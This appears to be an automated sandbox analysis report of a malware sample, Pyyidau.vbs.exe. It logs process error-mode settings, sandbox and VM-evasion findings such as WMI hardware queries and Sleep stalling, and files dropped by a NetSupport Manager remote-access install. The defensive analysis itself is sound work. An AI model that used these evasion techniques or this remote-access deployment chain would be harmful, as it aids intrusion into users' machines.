                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found stalling execution ending in API Sleep call
                                Source: C:\Windows\Installer\MSI1387.tmpStalling execution: Execution stalls by calling Sleep
                                Source: C:\Windows\Installer\MSIF985.tmpStalling execution: Execution stalls by calling Sleep
                                Powershell is started from unusual location (likely to bypass HIPS)
                                Source: c:\users\user\desktop\pyyidau.vbs.exeKey value queried: Powershell behaviorJump to behavior
                                Queries memory information (via WMI often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSystem information queried: FirmwareTableInformation
                                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: AD90000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: CDE0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBF9E0 OpenServiceW,GetLastError,SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,SetupDiEnumDeviceInfo,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,SetupDiCallClassInstaller,GetLastError,SetupDiDestroyDeviceInfoList,29_2_00FBF9E0
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeWindow / User API: threadDelayed 9765Jump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWindow / User API: threadDelayed 3206
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWindow / User API: threadDelayed 6040
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWindow / User API: threadDelayed 1045
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWindow / User API: threadDelayed 374
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWindow / User API: threadDelayed 5240
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIED08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3741.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE6B9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFCA3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEE46.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE748.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE9FC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF691.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEDC7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEBAA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEA9C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeDropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE5EC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF179.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF0BB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE9CD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF314.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEB6B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE98D.tmpJump to dropped file
